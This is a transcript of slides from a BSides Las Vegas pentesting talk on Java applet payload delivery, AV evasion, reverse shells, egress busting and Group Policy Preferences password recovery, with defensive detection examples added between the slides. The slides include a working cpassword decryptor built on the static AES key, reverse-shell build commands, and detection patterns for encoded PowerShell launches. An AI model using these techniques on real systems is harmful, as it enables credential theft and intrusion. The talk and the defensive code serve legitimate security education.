BSIDESLV Secret Pentesting Techniques
Transcript of BSIDESLV Secret Pentesting Techniques
BSIDES Las Vegas
Secret Pentesting Techniques Shhh...
Dave Kennedy Founder, Principal Security Consultant
Email: [email protected] https://www.trustedsec.com
@TrustedSec
Introduction
• As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use.
• Although some may or may not be public, they are generally obscure and not well known.
• The purpose of today’s talk is to show you my secrets: some of my techniques that I use that aren’t widely known.
• Why show you? I’m an open book on everything I do and sharing is what it’s all about.
Technique #1
• Java Applet Attack (SET) – Well known attack method, right?
• Do you know how it actually works?
• Do you know the techniques behind it to make it successful?
ZOMG APT
• News agencies around the world discovered a new and extremely advanced zero-day exploit against Java.
• Made me feel kind of special =)
• How did people find out it was SET?
ILIKEHUGS
DEMO: Walking through the Attack
Explaining the Applet
• Parameters that are injected into the HTML code are pulled from the Applet.
• Obfuscated and randomized each time.
• Parameters tell the Applet which attacks to use.
Method 1 – Binary Dropper
• Binary is downloaded from attacker machine via web server (Java downloader).
• Obfuscated binary each time per deployment: combination of PE manipulation, UPX, and rewriting the binary on the fly (import pefile).
DEMO: Binary Dropping Technique
Method 1 – Weak Sauce
• Binaries are easily picked up by AV if signatures focus on obfuscation techniques. (SET changes them each version.)
• Direct interaction with Windows file system and writing to disk.
• Multiple points of evidence on victim machine.
Method 2 – Shellcodeexec
• Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele.
• Executable takes the int main(int argc, char *argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space.
• Alphanumeric shellcode is executed in memory and payload is delivered.
DEMO: ShellcodeExec
Method 2 – Easily detectable
• Shellcodeexec is a simple yet awesome method but still has a number of drawbacks.
• Like Method 1 – binaries can be picked up unless a custom version is created. Direct interaction with Windows file system and writing to disk.
• Like Method 1 – multiple points of evidence on victim machine.
Method 3 – Powershell Injection
• Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8).
• Powershell gives us complete flexibility in a number of post-exploitation situations.
• Technique discovered by Matthew Graeber (you rock).
Method 3 – PS ShellCode Injection
• Applet detects if powershell is installed on the system.
• Grabs the operating system type (x86 / x64).
• Deploys shellcode straight through powershell.
DEMO: ShellcodeExec
Method 3 – Powershell Injection
• Never touches disk – AV / HIPS signatures go out the door.
• Obfuscated each time so that memory inspection is extremely difficult.
• Extremely reliable and stable.
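What these three slides describe from the attacker's side (a browser-hosted Java process starting PowerShell, with nothing written to disk) is exactly the parent/child relationship a defender can key on in process-creation telemetry, because on-disk signatures and memory inspection are what the method is built to defeat. The following is an added example and not code from the talk or from SET: the events are constructed sample values in the shape of Sysmon Event ID 1 / Windows 4688 data (paths, PIDs and command lines are made up), and the command-line switch rule encodes an assumption about how such launches usually look, not something the slides state.

```python
import ntpath
import re

# Constructed process-creation events (the fields Sysmon Event ID 1 or
# Windows 4688 would give you). Paths, PIDs and command lines are sample values.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "javaw.exe -classpath plugin.jar"},
    {"pid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand AAAAAAAAAAAAAAAA"},
    {"pid": 5012, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"pid": 5300, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Java\jre7\bin\java.exe",
     "cmdline": "cmd.exe /c dir"},
]

POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe"}
# Processes that host a browser-launched applet; an assumption made for this example
JAVA_HOSTS = {"java.exe", "javaw.exe", "javaws.exe"}
# Switches that hide the window or pass a base64 script; assumed indicators, not from the slides
SUSPICIOUS_SWITCHES = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand|w(?:indowstyle)?\s+hidden)\b")


def image_name(path):
    """Lower-cased file name of a Windows path (ntpath makes this work on any host OS)."""
    return ntpath.basename(path).lower()


def score_event(ev):
    """Return the list of rules one process-creation event trips (empty if none)."""
    reasons = []
    if image_name(ev["image"]) not in POWERSHELL_IMAGES:
        return reasons
    if image_name(ev["parent_image"]) in JAVA_HOSTS:
        reasons.append("powershell spawned by Java process")
    if SUSPICIOUS_SWITCHES.search(ev["cmdline"]):
        reasons.append("hidden window or encoded command switch")
    return reasons


def suspicious_powershell_launches(events):
    """(pid, reasons) for every PowerShell start that matches at least one rule."""
    return [(ev["pid"], score_event(ev)) for ev in events if score_event(ev)]


if __name__ == "__main__":
    for pid, why in suspicious_powershell_launches(SAMPLE_EVENTS):
        print(pid, "; ".join(why))
```

The parent/child rule carries more weight than the switch rule: the slide says the PowerShell stage is re-obfuscated on every run, so the command line is a moving target, but a plugin-hosting Java process has little legitimate reason to start PowerShell at all.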
PE Security Evasion
Scenario 1 – Dropping PE’s like it’s hot
• You’re using Metasploit – all of them are being picked up by AV, HIPS, etc.
• In most cases, I will rewrite the exe template for Metasploit to customize the binary for evasion.
• A couple of cool ways to do this.
Modifying PE For Evasion in MSF
• Easiest way for me is to make a simple program that creates a RWX process, then have the program execute Metasploit shellcode.
• You can also modify the Metasploit exe.rb template and obfuscate the code that way.
PE Crypters
• One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net).
• Encrypts the PE file using a randomized simple cipher key with AES 128.
• When the executable is run, it brute forces the AES key then decrypts the PE file for you.
DEMO: Hyperion
Hyperion Encryption
• Very cool concept and easy to use and write one for yourself.
• Ability to have a completely unique PE file each time.
• Slight downfall: the stub used for brute force is not polymorphic.
Building a Simple Reverse Shell
The Reverse Shell
• Connects out to the attacker (reverse shell).
Compiling Binaries
• PyInstaller – Compiles python code for you into a binary by wrapping the Python Interpreter into the executable.
• Works on Linux, OSX, and Windows.

```
python Configure.py
python Makespec.py --onefile --noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist
```
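Whatever shell.py does, a PyInstaller build leaves a fixed structural marker behind: the bootloader locates its packed archive through a trailer cookie that starts with PyInstaller's MAGIC bytes, so a defender can triage a "custom, byte-compiled" executable by that cookie rather than by any signature on the payload. The check below is an added example, not code from the talk or from pybuild.py; it uses the PyInstaller 2.0-era cookie layout (struct format `!8siiii`), and the sample executable images are constructed in memory rather than built with PyInstaller.

```python
import struct
import sys

# Cookie magic PyInstaller's bootloader searches for at the end of a bundle
# (PyInstaller's archive code defines it as b"MEI\014\013\012\013\016").
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# 2.0-era trailer: magic, package length, TOC offset, TOC length, python version (major*10+minor)
COOKIE_2_0 = struct.Struct("!8siiii")


def parse_pyinstaller_cookie(data):
    """Locate the trailer cookie in an executable image and decode it; None if absent."""
    off = data.rfind(PYINSTALLER_MAGIC)
    if off == -1 or off + COOKIE_2_0.size > len(data):
        return None
    _magic, pkg_len, toc_pos, toc_len, pyvers = COOKIE_2_0.unpack_from(data, off)
    return {
        "cookie_offset": off,
        "package_len": pkg_len,
        "toc_pos": toc_pos,
        "toc_len": toc_len,
        "python_version": "%d.%d" % divmod(pyvers, 10),   # 27 -> "2.7"
    }


def is_pyinstaller_bundle(data):
    return parse_pyinstaller_cookie(data) is not None


def build_sample_image(packed):
    """Constructed stand-in for a compiled shell.py: an MZ/PE-looking header plus
    filler, optionally with a PyInstaller-style archive and cookie appended as overlay."""
    image = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64) + b"PE\x00\x00" + b"\x90" * 4096
    if packed:
        archive = b"PYZ-00.pyz" + b"\x00" * 500          # stand-in for packed files + TOC
        cookie = COOKIE_2_0.pack(PYINSTALLER_MAGIC, len(archive) + COOKIE_2_0.size,
                                 len(archive) - 100, 100, 27)
        image += archive + cookie
    return image


def scan_files(paths):
    """Map each path to its decoded cookie (or None) so a triage run can list bundles."""
    results = {}
    for path in paths:
        with open(path, "rb") as fh:
            results[path] = parse_pyinstaller_cookie(fh.read())
    return results


if __name__ == "__main__":
    for path, info in scan_files(sys.argv[1:]).items():
        print(path, "PyInstaller bundle" if info else "no PyInstaller cookie", info or "")
```

The cookie is what the bootloader itself depends on, so it cannot be stripped without breaking the binary; newer PyInstaller releases extend the trailer with extra fields after these 24 bytes, but the leading magic and the fields decoded here stay in place.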
Making it easy – pybuild.py
• All code and samples will be released on the TrustedSec website soon.
DEMO: Building a Shell
Bypassing AV
Finding your way home
Bumping the Firewall
• A number of companies restrict ports outbound and only allow what’s needed for the business.
• Trouble getting payloads out, especially if you only have one shot.
Egress Busting
• Few ways to do it: pre-staged payload for identifying a way out.
• Attempt staged reverse on every port.
• Metasploit has an ALLPORTS payload as well.
Egress Buster 0.2
• Server/Client situation where victim connects out on every port, 1024 ports at a time.
• Server listens for connection and reports back.
• Here’s where you can have some fun.
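Seen from the firewall, the busting pattern just described (one internal host trying every port at one external address, 1024 at a time) stands out in the deny log long before the shell comes back, and the log also tells you which obscure port got through. The example below is added here and is not part of Egress Buster or the talk: the log line format, addresses and timestamps are constructed for the demo, and the threshold and window values are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed firewall record format, one connection attempt per line:
#   <ISO timestamp> <ALLOW|DENY> TCP <src>:<sport> -> <dst>:<dport>
LINE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) TCP "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")


def parse_line(line):
    """Parse one record; None for lines that are not TCP connection attempts."""
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["dport"] = int(rec["dport"])
    return rec


def egress_sweeps(lines, threshold=64, window=timedelta(seconds=60)):
    """Flag (src, dst) pairs where one internal host tried more than `threshold`
    distinct destination ports at a single external host inside `window`.
    Returns {(src, dst): {"distinct_ports": peak, "allowed": [ports that got out]}}."""
    by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_pair[(rec["src"], rec["dst"])].append(rec)
    hits = {}
    for pair, recs in by_pair.items():
        recs.sort(key=lambda r: r["ts"])
        peak, lo = 0, 0
        for hi in range(len(recs)):                      # sliding time window
            while recs[hi]["ts"] - recs[lo]["ts"] > window:
                lo += 1
            peak = max(peak, len({r["dport"] for r in recs[lo:hi + 1]}))
        if peak > threshold:
            allowed = sorted({r["dport"] for r in recs if r["action"] == "ALLOW"})
            hits[pair] = {"distinct_ports": peak, "allowed": allowed}
    return hits


def build_sample_log():
    """Constructed log: 10.1.5.22 sweeps ports 1024-2047 at 203.0.113.10 in about
    20 seconds (only 1337 is let out); 10.1.5.40 just talks to a web server on 443."""
    base = datetime(2012, 7, 25, 10, 0, 0)
    lines = []
    for i in range(1024):
        ts = (base + timedelta(milliseconds=20 * i)).strftime("%Y-%m-%dT%H:%M:%SZ")
        dport = 1024 + i
        action = "ALLOW" if dport == 1337 else "DENY"
        lines.append(f"{ts} {action} TCP 10.1.5.22:{49152 + i} -> 203.0.113.10:{dport}")
    for i in range(5):
        ts = (base + timedelta(seconds=7 * i)).strftime("%Y-%m-%dT%H:%M:%SZ")
        lines.append(f"{ts} ALLOW TCP 10.1.5.40:{50000 + i} -> 198.51.100.7:443")
    return lines


if __name__ == "__main__":
    for (src, dst), info in egress_sweeps(build_sample_log()).items():
        print(f"{src} -> {dst}: {info['distinct_ports']} ports tried, allowed out on {info['allowed']}")
```

The "allowed" list is the actionable part: a sweep that found an open obscure port is a firewall rule to review, whereas a sweep that found nothing is still a compromised host to look at.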
Egress Buster Reverse Shell
Egress Buster Reverse Shell
• Released this week!
• Allows you to bust all ports inside the firewall and spawn a command shell.
• Custom, so no AV picks this up. Byte compiled into an executable.
DEMO: Egress Buster Reverse Shell
Egress Buster Reverse Shell Usage
• Recent penetration test – found file upload + execute binaries.
• Could not find a standard port out, i.e. 80, 443, 53, 25, etc.
• Wrote this to deploy and found several obscure ports that were allowed.
Fun with Group Policy
One of my PERSONAL Favorites
• How many times have we been on a pentest with just a domain user?
• Need that local administrator account for all of the domain computers?
Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
The Attack
• Navigate to a domain controller and hit up the SYSVOL share.
• Head to the domain name and Policies folder.
• Look for a GUID then MACHINE\Preferences\Group.
• Look for the Groups.xml file.
Contents of File
Static Key for AES Anyone?
Python Code

```python
# code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
# (the slide's code was Python 2 / PyCrypto; shown here in Python 3 with pycryptodome)
from Crypto.Cipher import AES
from base64 import b64decode

# the static AES-256 key Microsoft documents for Group Policy Preferences cpassword values
key = bytes.fromhex("""
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ", "").replace("\n", ""))

# cpassword attribute value exactly as it appears in Groups.xml
cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")

# AES-CBC with an all-zero IV (the bare mode "2" in the original is AES.MODE_CBC)
o = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(cpassword)
# strip PKCS#7 padding, then decode the UTF-16LE plaintext
print(o[:-o[-1]].decode("utf16"))
```
Decrypted Password

```
>>> print o[:-ord(o[-1])].decode('utf16')
Local*P4ssword!
```
Expanding on Group.xml
More Passwords Stored
• The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute.
• Services, ScheduledTasks, SQL servers and much more are impacted.
List of Other Affected Areas (from rewt dance)
• Services\Services.xml: http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
• ScheduledTasks\ScheduledTasks.xml: http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13), http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13), http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)
• Printers\Printers.xml: http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)
• Drives\Drives.xml: http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)
• DataSources\DataSources.xml: http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
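Since every domain user can read SYSVOL, these are the files a defender should sweep before anyone else does. The audit below is an added example (not code from the talk, the Sogeti article or rewt dance): it walks preference XML of the kinds listed above, reports every element carrying a cpassword attribute together with the account it belongs to, and decrypts nothing. The XML snippets are constructed to match the preference file layout, and the GUID and ciphertext values are placeholders.

```python
import xml.etree.ElementTree as ET

# The attribute naming the account differs per preference type
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed samples modelled on the Group Policy Preferences XML layout.
# {GUID-PLACEHOLDER} stands for a policy GUID; cpassword values are placeholders.
SAMPLE_FILES = {
    r"Policies\{GUID-PLACEHOLDER}\Machine\Preferences\Groups\Groups.xml": """
<Groups>
  <User name="Administrator (built-in)">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="PLACEHOLDER_CIPHERTEXT_1" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>""",
    r"Policies\{GUID-PLACEHOLDER}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml": """
<ScheduledTasks>
  <Task name="Nightly backup">
    <Properties action="C" name="Nightly backup" appName="backup.exe"
        runAs="CORP\\svc_backup" cpassword="PLACEHOLDER_CIPHERTEXT_2"/>
  </Task>
</ScheduledTasks>""",
    r"Policies\{GUID-PLACEHOLDER}\Machine\Preferences\Services\Services.xml": """
<NTServices>
  <NTService name="Spooler">
    <Properties startupType="AUTOMATIC" serviceName="Spooler"
        accountName="CORP\\svc_print" cpassword="PLACEHOLDER_CIPHERTEXT_3"/>
  </NTService>
</NTServices>""",
    r"Policies\{GUID-PLACEHOLDER}\User\Preferences\Drives\Drives.xml": """
<Drives>
  <Drive name="H:">
    <Properties action="U" path="\\\\fileserver\\home" username="" cpassword=""/>
  </Drive>
</Drives>""",
    r"Policies\{GUID-PLACEHOLDER}\User\Preferences\Printers\Printers.xml": """
<Printers>
  <SharedPrinter name="Lobby">
    <Properties action="U" path="\\\\printsrv\\lobby"/>
  </SharedPrinter>
</Printers>""",
}


def find_cpasswords(files):
    """One finding per preference item whose Properties carry a cpassword attribute.
    `files` maps a SYSVOL-relative path to the XML text of that file."""
    findings = []
    for path, xml_text in files.items():
        root = ET.fromstring(xml_text.strip())
        for item in root:                      # User, Task, NTService, Drive, ...
            for elem in item.iter():
                if "cpassword" not in elem.attrib:
                    continue
                account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if elem.attrib.get(a)), "(none)")
                findings.append({
                    "file": path,
                    "item": "%s %r" % (item.tag, item.attrib.get("name", "")),
                    "account": account,
                    # an empty attribute means no credential is stored, only the field exists
                    "stored_password": bool(elem.attrib["cpassword"]),
                })
    return findings


def summarize(findings):
    """Split hits into 'field present' versus 'credential actually stored'."""
    stored = sum(1 for f in findings if f["stored_password"])
    return {"items_with_cpassword_attr": len(findings), "items_storing_password": stored}


if __name__ == "__main__":
    hits = find_cpasswords(SAMPLE_FILES)
    for h in hits:
        flag = "STORED" if h["stored_password"] else "empty"
        print(f"[{flag}] {h['file']}: {h['item']} as {h['account']}")
    print(summarize(hits))
```

Run it against every Preferences\*.xml under Policies on the domain controllers; each stored hit is a credential recoverable by any domain user with the static key shown above, so the preference item should be removed and that password changed. Microsoft's later fix (MS14-025) stopped new passwords from being saved this way but left existing cpassword entries in place, which is why the sweep is still worth doing.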
There’s a ton more of these…
Hopefully can make these a series.
Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques Shhh...
Dave Kennedy Founder, Principal Security Consultant
Email: [email protected] https://www.trustedsec.com
TrustedSec, LLC @TrustedSec